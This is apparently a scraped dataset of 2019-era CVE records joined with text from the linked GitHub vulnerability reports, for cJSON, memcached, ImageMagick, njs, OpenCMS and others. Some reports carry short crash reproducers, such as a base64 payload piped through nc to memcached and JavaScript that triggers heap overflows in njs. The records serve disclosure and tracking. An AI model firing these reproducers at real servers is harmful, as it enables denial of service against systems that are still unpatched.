[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cjson_project:cjson:*:*:*:*:*:*:*:*", "matchCriteriaId": "A3541972-75F2-49E4-8BE8-938C3C6999FF", "versionEndExcluding": "0.0.0", "versionEndIncluding": null, "versionStartExc...
[ "125" ]
125
https://github.com/DaveGamble/cJSON/issues/30
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "DaveGamble", "cJSON" ]
Hi, I would like to report a buffer overflow in cJSON, you can test this PoC with a ODD string ``` #include <stdio.h> #include <stdint.h> #include <fcntl.h> #include "cJSON.h" static const char *my_json = "\"000000000000000000\\"; int main(int argc, const char * argv[]) { cJSON * root = cJSON_Parse(my_json); ...
cJSON buffer overflow with odd formatted JSON string
https://api.github.com/repos/DaveGamble/cJSON/issues/30/comments
3
2016-10-01T08:19:37Z
2016-11-07T09:37:58Z
https://github.com/DaveGamble/cJSON/issues/30
180,445,377
30
358
CVE-2019-11596
2019-04-29T15:29:00.983
In memcached before 1.5.14, a NULL pointer dereference was found in the "lru mode" and "lru temp_ttl" commands. This causes a denial of service when parsing crafted lru command messages in process_lru_command in memcached.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00060.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/memcached/memcached/commit/d35334f368817a...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*", "matchCriteriaId": "85D5D451-DE60-4DD3-8283-D838785D20AC", "versionEndExcluding": "1.5.14", "versionEndIncluding": null, "versionStartEx...
[ "476" ]
476
https://github.com/memcached/memcached/issues/474
[ "Exploit", "Third Party Advisory" ]
github.com
[ "memcached", "memcached" ]
Dear memcached team — I have detected a SIGSEGV during the lru command handling. #### Version bb0980fbbafd4eb723f76918e7ca364360315c1b #### How to reproduce Start memcached `$ memcached` Send malicious payload via nc: `$ echo -n "bHJ1IG1vZGUKb7G0AGxydWRl6gdtTk9UXw==" | base64 -d | nc 127.0.0.1 11211` #...
segfault (null pointer dereference) during lru command handling
https://api.github.com/repos/memcached/memcached/issues/474/comments
3
2019-04-10T10:38:46Z
2019-05-05T11:39:44Z
https://github.com/memcached/memcached/issues/474
431,429,993
474
359
CVE-2019-11597
2019-04-29T16:29:00.407
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00043.html" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:q16:*:*:*:*:*:*", "matchCriteriaId": "2EDF50C4-9FFE-4EBF-A5BE-44AF7E6988D9", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/1555
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [X] I have written a descriptive issue title - [X] I have verified that I am using the latest version of ImageMagick - [X] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
heap_buffer_overflow in WriteTIFFImage of coders/tiff.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1555/comments
2
2019-04-27T13:08:13Z
2019-05-04T14:21:50Z
https://github.com/ImageMagick/ImageMagick/issues/1555
437,941,914
1,555
360
CVE-2019-11598
2019-04-29T16:29:00.470
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00057.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-40:q16:*:*:*:*:*:*", "matchCriteriaId": "389645FC-93EE-430B-AFAB-108570F3857D", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/1540
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [X] I have written a descriptive issue title - [X] I have verified that I am using the latest version of ImageMagick - [X] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
heap-buffer-overflow in WritePNMImage of coders/pnm.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1540/comments
6
2019-04-08T03:10:13Z
2019-05-12T11:30:48Z
https://github.com/ImageMagick/ImageMagick/issues/1540
430,236,223
1,540
361
CVE-2019-11632
2019-05-01T14:29:00.483
In Octopus Deploy 2019.1.0 through 2019.3.1 and 2019.4.0 through 2019.4.5, an authenticated user with the VariableViewUnscoped or VariableEditUnscoped permission scoped to a specific project could view or edit unscoped variables from a different project. (These permissions are only used in custom User Roles and do not ...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL"...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/5528" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/55...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:octopus:octopus_deploy:*:*:*:*:*:*:*:*", "matchCriteriaId": "EEF5B5BF-E265-46DC-A509-3DC3B426D817", "versionEndExcluding": null, "versionEndIncluding": "2019.3.1", "versionSt...
[ "269" ]
269
https://github.com/OctopusDeploy/Issues/issues/5528
[ "Exploit", "Third Party Advisory" ]
github.com
[ "OctopusDeploy", "Issues" ]
# Prerequisites - [x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process](https://octopushq.atlassian.net/wiki/spaces/IN/pages/2430143/Security+Disclosure+Policy). - [x] I have raised a CVE according to our [CVE process] (https://octopushq.atlassian.net/...
Variable[View/Edit]Unscoped permissions don't comply with project scoping (CVE-2019-11632)
https://api.github.com/repos/OctopusDeploy/Issues/issues/5528/comments
3
2019-05-01T05:11:04Z
2019-07-31T08:42:24Z
https://github.com/OctopusDeploy/Issues/issues/5528
439,070,509
5,528
362
CVE-2019-11632
2019-05-01T14:29:00.483
In Octopus Deploy 2019.1.0 through 2019.3.1 and 2019.4.0 through 2019.4.5, an authenticated user with the VariableViewUnscoped or VariableEditUnscoped permission scoped to a specific project could view or edit unscoped variables from a different project. (These permissions are only used in custom User Roles and do not ...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL"...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/5528" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/55...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:octopus:octopus_deploy:*:*:*:*:*:*:*:*", "matchCriteriaId": "EEF5B5BF-E265-46DC-A509-3DC3B426D817", "versionEndExcluding": null, "versionEndIncluding": "2019.3.1", "versionSt...
[ "269" ]
269
https://github.com/OctopusDeploy/Issues/issues/5529
[ "Third Party Advisory" ]
github.com
[ "OctopusDeploy", "Issues" ]
This bug represents [this issue](https://github.com/OctopusDeploy/Issues/issues/5528) in LTS 2019.3
Variable[View/Edit]Unscoped permissions don't comply with project scoping (CVE-2019-11632)
https://api.github.com/repos/OctopusDeploy/Issues/issues/5529/comments
3
2019-05-01T05:15:06Z
2019-07-31T08:42:27Z
https://github.com/OctopusDeploy/Issues/issues/5529
439,071,058
5,529
363
CVE-2019-11641
2019-05-01T18:29:01.550
Anomali Agave (formerly Drupot) through 1.0.0 fails to avoid fingerprinting by including predictable data and minimal variation in size within HTML templates, giving attackers the ability to detect and avoid this system.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/threatstream/agave/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:anomali:agave:*:*:*:*:*:*:*:*", "matchCriteriaId": "0ACE5B38-0711-4A94-B943-AF9717CEC465", "versionEndExcluding": null, "versionEndIncluding": "1.0.0", "versionStartExcluding...
[ "330" ]
330
https://github.com/threatstream/agave/issues/1
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "threatstream", "agave" ]
Agave fails to avoid fingerprinting by including predictable data and minimal variation in size within HTML templates. Giving attackers the ability to detect and avoid this system. CVE-2019-11641 Gionathan Armando Reale
Fingerprinting
https://api.github.com/repos/pwnlandia/agave/issues/1/comments
1
2019-05-01T11:18:28Z
2019-05-31T23:06:32Z
https://github.com/pwnlandia/agave/issues/1
439,134,478
1
364
CVE-2019-10249
2019-05-06T16:29:00.240
All Xtext & Xtend versions prior to 2.18.0 were built using HTTP instead of HTTPS file transfer and thus the built artifacts may have been compromised.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "emo@eclipse.org", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=546996" }, { "source": "emo@eclipse.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "h...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eclipse:xtend:*:*:*:*:*:*:*:*", "matchCriteriaId": "935976C9-C545-4C52-9822-E107685CD302", "versionEndExcluding": "2.18.0", "versionEndIncluding": null, "versionStartExcludin...
[ "116" ]
116
https://github.com/eclipse/xtext-xtend/issues/759
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "eclipse", "xtext-xtend" ]
[CWE-829: Inclusion of Functionality from Untrusted Control Sphere](https://cwe.mitre.org/data/definitions/829.html) [CWE-494: Download of Code Without Integrity Check](https://cwe.mitre.org/data/definitions/494.html) The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. A...
[CVE-2019-10249][SECURITY] Releases are built/executed/released in the context of insecure/untrusted code
https://api.github.com/repos/eclipse-archived/xtext-xtend/issues/759/comments
17
2019-03-26T15:43:58Z
2019-05-06T17:25:09Z
https://github.com/eclipse-archived/xtext-xtend/issues/759
425,497,425
759
365
CVE-2019-11808
2019-05-07T07:29:05.167
Ratpack versions before 1.6.1 generate a session ID using a cryptographically weak PRNG in the JDK's ThreadLocalRandom. This means that if an attacker can determine a small window for the server start time and obtain a session ID value, they can theoretically determine the sequence of session IDs.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ratpack/ratpack/commit/f2b63eb82dd71194319fd3945f5edf29b8f3a42d" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ratpack_project:ratpack:*:*:*:*:*:*:*:*", "matchCriteriaId": "1FB3DD33-AEA0-48E6-9600-2B857CB25D61", "versionEndExcluding": "1.6.1", "versionEndIncluding": null, "versionStar...
[ "338" ]
338
https://github.com/ratpack/ratpack/issues/1448
[ "Patch", "Third Party Advisory" ]
github.com
[ "ratpack", "ratpack" ]
Use UUID directly for generating session IDs
https://api.github.com/repos/ratpack/ratpack/issues/1448/comments
1
2019-04-23T01:51:49Z
2019-04-24T17:40:33Z
https://github.com/ratpack/ratpack/issues/1448
435,961,699
1,448
366
CVE-2019-10742
2019-05-07T19:29:00.690
Axios up to and including 0.18.0 allows attackers to cause a denial of service (application crash) by continuing to accepting content after maxContentLength is exceeded.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://app.snyk.io/vuln/SNYK-JS-AXIOS-174505" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ax...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "396BB583-B6CD-444E-9B24-DA0C42F6C42F", "versionEndExcluding": null, "versionEndIncluding": "0.18.0", "versionStartExcl...
[ "755" ]
755
https://github.com/axios/axios/issues/1098
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axios", "axios" ]
#### Summary The following code demonstrates the issue: ```javascript require('axios').get( 'https://upload.wikimedia.org/wikipedia/commons/f/fe/A_Different_Slant_on_Carina.jpg', { maxContentLength: 2000 } ) .then(d => console.log('done')) .catch(e => console.log(e.toString())) ``` Expected beha...
Download continues after maxContentLength exceeded
https://api.github.com/repos/axios/axios/issues/1098/comments
7
2017-09-22T06:34:42Z
2020-05-22T13:06:23Z
https://github.com/axios/axios/issues/1098
259,716,605
1,098
367
CVE-2019-11818
2019-05-08T16:29:00.737
Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting (XSS) in the module New User (/opencms/system/workplace/admin/accounts/user_new.jsp). This allows an attacker to insert arbitrary JavaScript as user input (First Name or Last Name), which will be executed whenever the affected snippet is load...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/alkacon/opencms-core/issues/635" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "https://www...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*", "matchCriteriaId": "BFDD07EF-673F-485F-B0C7-AC2F8B8EC945", "versionEndExcluding": null, "versionEndIncluding": "10.5.4", "versionStartExclud...
[ "79" ]
79
https://github.com/alkacon/opencms-core/issues/635
[ "Exploit", "Third Party Advisory" ]
github.com
[ "alkacon", "opencms-core" ]
Hello Team, I would like to report a vulnerability (cross-site-scripting) which I have observed in current version v10.5.4 and before. Cross-Site Scripting (XSS) allows attacker to inject the malicious JavaScript as user input and then malicious script can access any cookies, session tokens, or other sensitive in...
Cross Site Scripting | v10.5.4 | New User
https://api.github.com/repos/alkacon/opencms-core/issues/635/comments
2
2019-04-08T08:22:14Z
2021-10-07T12:49:01Z
https://github.com/alkacon/opencms-core/issues/635
430,317,717
635
368
CVE-2019-11819
2019-05-08T16:29:00.830
Alkacon OpenCMS v10.5.4 and before is affected by CSV (aka Excel Macro) Injection in the module New User (/opencms/system/workplace/admin/accounts/user_new.jsp) via the First Name or Last Name.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/alkacon/opencms-core/issues/636" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "https://www...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*", "matchCriteriaId": "BFDD07EF-673F-485F-B0C7-AC2F8B8EC945", "versionEndExcluding": null, "versionEndIncluding": "10.5.4", "versionStartExclud...
[ "1236" ]
1236
https://github.com/alkacon/opencms-core/issues/636
[ "Exploit", "Third Party Advisory" ]
github.com
[ "alkacon", "opencms-core" ]
Hello Team, I would like to report a vulnerability (CSV Injection) which I have observed in current version v10.5.4 and before. When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously cr...
CSV Injection | v10.5.4 | New User
https://api.github.com/repos/alkacon/opencms-core/issues/636/comments
3
2019-04-08T10:36:24Z
2021-10-07T14:38:03Z
https://github.com/alkacon/opencms-core/issues/636
430,376,699
636
369
CVE-2019-11406
2019-05-08T18:29:00.343
Subrion CMS 4.2.1 allows _core/en/contacts/ XSS via the name, email, or phone parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/intelliants/subrion/commits/develop" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/intelliants/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:intelliants:subrion_cms:4.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "1964CC54-4FD5-44DF-A183-0538C48EA988", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "79" ]
79
https://github.com/intelliants/subrion/issues/821
[ "Exploit", "Third Party Advisory" ]
github.com
[ "intelliants", "subrion" ]
> # Title: [Subrion CMS- 4.2.1 XSS] > # Date: [12-04-2019] > # [Vulnerability Type] > Cross Site Scripting (XSS) > # Version: [4.2.1] > # Tested on: [Windows,FireFox] > # [Affected Product Code Base] > Subrion CMS - 4.2.1 > # [Affected Component] > parameter: name. > parameter: email. > parameter: phone. ...
demos.subrion.org allows _core/en/contacts/ XSS via the name, email, or phone parameter
https://api.github.com/repos/intelliants/subrion/issues/821/comments
1
2019-04-21T17:35:42Z
2020-02-28T05:05:11Z
https://github.com/intelliants/subrion/issues/821
435,530,877
821
370
CVE-2019-11838
2019-05-09T14:29:00.557
njs through 0.3.1, used in NGINX, has a heap-based buffer overflow in Array.prototype.splice after a resize, related to njs_array_prototype_splice in njs/njs_array.c, because of njs_array_expand size mishandling.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/153" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Ad...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742", "versionEndExcluding": null, "versionEndIncluding": "0.3.1", "versionStartExcluding": null...
[ "787" ]
787
https://github.com/nginx/njs/issues/153
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
```js var v0=[] var x = new Array(10) var i = 0 while (i < 100) { v0.shift(v0.splice(0, "AAAA", "BBBB")) i++; } ``` ```js $ njs test.js ==21010==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d00000c700 at pc 0x000000447d20 bp 0x7fffbdc99110 sp 0x7fffbdc99100 WRITE of size 16 at 0x...
heap-buffer-overflow in Array.prototype.splice() after resize.
https://api.github.com/repos/nginx/njs/issues/153/comments
0
2019-05-07T17:43:35Z
2019-05-14T17:37:45Z
https://github.com/nginx/njs/issues/153
441,355,829
153
373
CVE-2019-11839
2019-05-09T14:29:00.637
njs through 0.3.1, used in NGINX, has a heap-based buffer overflow in Array.prototype.push after a resize, related to njs_array_prototype_push in njs/njs_array.c, because of njs_array_expand size mishandling.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/152" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Ad...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742", "versionEndExcluding": null, "versionEndIncluding": "0.3.1", "versionStartExcluding": null...
[ "787" ]
787
https://github.com/nginx/njs/issues/152
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
```js var v0=[], i = 0; while (i++ < 100) { v0.push(v0.shift(0)); } ``` ```sh $ njs test.js ==13374==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d00000c7d0 at pc 0x000000447165 bp 0x7ffd25e422b0 sp 0x7ffd25e422a 0 WRITE of size 16 at 0x60d00000c7d0 thread T0 #0 0x447164 in njs...
heap-buffer-overflow in Array.prototype.push() after resize.
https://api.github.com/repos/nginx/njs/issues/152/comments
0
2019-05-07T17:30:56Z
2019-05-08T22:22:13Z
https://github.com/nginx/njs/issues/152
441,350,927
152
374
CVE-2017-12804
2019-05-09T16:29:00.247
The iwgif_init_screen function in imagew-gif.c:510 in ImageWorsener 1.3.2 allows remote attackers to cause a denial of service (hmemory exhaustion) via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jsummers/imageworsener/issues/30" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://g...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:entropymine:imageworsener:1.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "E435E26A-659E-4A65-A6BF-1AA33DFE4D7B", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "400" ]
400
https://github.com/jsummers/imageworsener/issues/30
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jsummers", "imageworsener" ]
root@ubuntu:/home/hjy/Desktop# imagew oom-iwgif_init_screen1 imout/out -outfmt png oom-iwgif_init_screen1 → imout/out ==12401==ERROR: AddressSanitizer failed to allocate 0x76eb4000 (1995128832) bytes of LargeMmapAllocator: 12 ==12401==Process memory map follows: 0x08048000-0x0812c000 /usr/local/bin/imagew 0x0812...
memory exhausted in iwgif_init_screen
https://api.github.com/repos/jsummers/imageworsener/issues/30/comments
1
2017-08-06T06:01:53Z
2019-05-12T13:10:28Z
https://github.com/jsummers/imageworsener/issues/30
248,227,834
30
375
CVE-2017-12805
2019-05-09T16:29:00.327
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/664" }...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.6-6:*:*:*:*:*:*:*", "matchCriteriaId": "157776E9-D30D-48D2-B845-ED6315B8C5DC", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "400" ]
400
https://github.com/ImageMagick/ImageMagick/issues/664
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
``` root@ubuntu:/home/hjy/Desktop# convert oom-ReadTIFFImage /dev/null ==27669==ERROR: AddressSanitizer failed to allocate 0x80002000 (-2147475456) bytes of LargeMmapAllocator: 12 ==27669==Process memory map follows: 0x08048000-0x09714000 /usr/local/bin/magick 0x09714000-0x09715000 /usr/local/bin/magick 0x0971...
memory exhaustion in ReadTIFFImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/664/comments
2
2017-08-10T05:00:53Z
2019-05-10T01:41:54Z
https://github.com/ImageMagick/ImageMagick/issues/664
249,233,709
664
376
CVE-2017-12806
2019-05-09T16:29:00.373
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/660" }...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.6-6:*:*:*:*:*:*:*", "matchCriteriaId": "157776E9-D30D-48D2-B845-ED6315B8C5DC", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "400" ]
400
https://github.com/ImageMagick/ImageMagick/issues/660
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
``` root@ubuntu:/home/hjy/Desktop# convert oom-format8BIM /dev/null ==8638==ERROR: AddressSanitizer failed to allocate 0x72e8d000 (1927860224) bytes of LargeMmapAllocator: 12 ==8638==Process memory map follows: 0x08048000-0x0971a000 /usr/local/bin/magick 0x0971a000-0x0971b000 /usr/local/bin/magick 0x0971b000-0...
memory exhaustion in format8BIM
https://api.github.com/repos/ImageMagick/ImageMagick/issues/660/comments
2
2017-08-08T03:28:18Z
2019-05-10T01:41:26Z
https://github.com/ImageMagick/ImageMagick/issues/660
248,590,588
660
377
CVE-2019-11840
2019-05-09T16:29:00.607
An issue was discovered in the supplementary Go cryptography library, golang.org/x/crypto, before v0.0.0-20190320223903-b7391e95e576. A flaw was found in the amd64 implementation of the golang.org/x/crypto/salsa20 and golang.org/x/crypto/salsa20/salsa packages. If more than 256 GiB of keystream is generated, or if the ...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL...
